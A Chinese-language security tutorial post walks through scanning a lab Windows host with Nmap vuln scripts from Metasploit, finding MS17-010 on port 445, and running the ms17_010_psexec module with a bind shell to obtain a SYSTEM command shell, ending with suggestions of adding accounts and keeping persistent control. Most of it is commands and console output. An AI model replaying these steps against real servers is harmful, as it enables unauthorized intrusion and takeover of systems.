利用Metasploit+Nmap简单几步进行渗透网络服务器,直接获取管理权限

释放双眼,带上耳机,听听看~!

Metasploit这个强大的渗透工具,在这里我就不做过多介绍了,还有Nmap也是一个强大端口扫描工具,在黑客界里无人不知无人不晓,本次主要讲解,这两款工具结合使用,废话不扯,直接进入正题。

第一步:利用Nmap扫描

msf5 > db_nmap --script=vuln 192.168.41.143

[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:25 CST

[*] Nmap: Nmap scan report for 192.168.41.143

[*] Nmap: Host is up (0.00055s latency).

[*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered

[*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware)

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 36.95 seconds

msf5 > db_nmap --script=vuln 192.168.41.143

[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:28 CST

[*] Nmap: Nmap scan report for 192.168.41.143

[*] Nmap: Host is up (0.00076s latency).

[*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered

[*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware)

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 38.98 seconds

msf5 > db_nmap --script=vuln 192.168.41.142

[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:30 CST

[*] Nmap: Nmap scan report for 192.168.41.142

[*] Nmap: Host is up (0.00044s latency).

[*] Nmap: Not shown: 997 closed ports

[*] Nmap: PORT    STATE SERVICE

[*] Nmap: 135/tcp open  msrpc

[*] Nmap: 139/tcp open  netbios-ssn

[*] Nmap: 445/tcp open  microsoft-ds

[*] Nmap: MAC Address: 00:0C:29:5D:58:E1 (VMware)

[*] Nmap: Host script results:

[*] Nmap: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

[*] Nmap: |_smb-vuln-ms10-054: false

[*] Nmap: |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

[*] Nmap: | smb-vuln-ms17-010:

[*] Nmap: |   VULNERABLE:

[*] Nmap: |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

[*] Nmap: |     State: VULNERABLE

[*] Nmap: |     IDs:  CVE:CVE-2017-0143

[*] Nmap: |     Risk factor: HIGH

[*] Nmap: |       A critical remote code execution vulnerability exists in Microsoft SMBv1

[*] Nmap: |        servers (ms17-010).

[*] Nmap: |

[*] Nmap: |     Disclosure date: 2017-03-14

[*] Nmap: |     References:

[*] Nmap: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

[*] Nmap: |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

[*] Nmap: |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds

看到扫描结果,我们可以看出来,有几个可以了利用漏洞,开发445端口是存在smb的,我们随便利用一个漏洞来进行渗透攻击。

第二步:利用Metasploit查询对应的漏洞模块

首先我们输入命令:search ms17-010 查询有没有对应的漏洞模块,

msf5 > search ms17-010

Matching Modules

================

   #  Name                                           Disclosure Date  Rank     Check  Description

   -  ----                                           ---------------  ----     -----  -----------

   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection

   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

显示结果是有对应漏洞模块的,ms17 指的是2017年出现的漏洞,有对应漏洞那就好办了,下面三个我们随便选一个出来,我这里选最后一个来进一步渗透攻击。

第三步:选择对应攻击模块

由于不能截完整图,我附代码,

msf5 > use exploit/windows/smb/ms17_010_psexec

msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp

payload => windows/shell_bind_tcp

msf5 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description

   ----                  ---------------                                                 --------  -----------

   DBGTRACE              false                                                           yes       Show extra debug trace info

   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction

   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)

   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check

   RHOSTS                                                                                yes       The target address range or CIDR identifier

   RPORT                 445                                                             yes       The Target port

   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing

   SERVICE_DISPLAY_NAME                                                                  no        The service display name

   SERVICE_NAME                                                                          no        The service name

   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share

   SMBDomain             .                                                               no        The Windows domain to use for authentication

   SMBPass                                                                               no        The password for the specified username

   SMBUser                                                                               no        The username to authenticate as

Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)

   LPORT     4444             yes       The listen port

   RHOST                      no        The target address

Exploit target:

   Id  Name

   --  ----

   0   Automatic

首先我们要命令:

show options

查看需要做哪些配置,当然攻击目标服务器ip设置上去,配置好之后万事俱备,

msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.41.142

RHOSTS => 192.168.41.142

msf5 exploit(windows/smb/ms17_010_psexec) >

到这里已经全部配置好,接下来有点激动,迫不及待发出进攻号令发动进攻,进攻号令:exploit 

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] 192.168.41.142:445 - Target OS: Windows 5.1

[*] 192.168.41.142:445 - Filling barrel with fish... done

[*] 192.168.41.142:445 - <---------------- | Entering Danger Zone | ---------------->

[*] 192.168.41.142:445 -   [*] Preparing dynamite...

[*] 192.168.41.142:445 -     [*] Trying stick 1 (x86)...Boom!

[*] 192.168.41.142:445 -   [+] Successfully Leaked Transaction!

[*] 192.168.41.142:445 -   [+] Successfully caught Fish-in-a-barrel

[*] 192.168.41.142:445 - <---------------- | Leaving Danger Zone | ---------------->

[*] 192.168.41.142:445 - Reading from CONNECTION struct at: 0x821e58b0

[*] 192.168.41.142:445 - Built a write-what-where primitive...

[+] 192.168.41.142:445 - Overwrite complete... SYSTEM session obtained!

[*] 192.168.41.142:445 - Selecting native target

[*] 192.168.41.142:445 - Uploading payload... uIppviFQ.exe

[*] 192.168.41.142:445 - Created uIppviFQ.exe...

[+] 192.168.41.142:445 - Service started successfully...

[*] 192.168.41.142:445 - Deleting uIppviFQ.exe...

[*] Started bind TCP handler against 192.168.41.142:4444

[*] Command shell session 1 opened (192.168.41.128:33767 -> 192.168.41.142:4444) at 2019-08-24 01:41:00 +0800

看到现在已经对445端口进军了,

在后面我们可以看出来,成功入侵并且反弹一个shell,

现在成功拿下这台服务器系统权限,看网络连接情况,已经成功链接,拿到cmd权限可以这这台服务器实施控制,比如我们创建系统账号提权,对这台服务器做持久控制,

相关文章

人已赞赏
安全教程

逻辑漏洞-密码重置漏洞总结

2020-3-9 20:51:07

安全教程

Apache 漏洞之后缀名解析漏洞

2020-3-10 15:23:06

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
有新消息 消息中心
搜索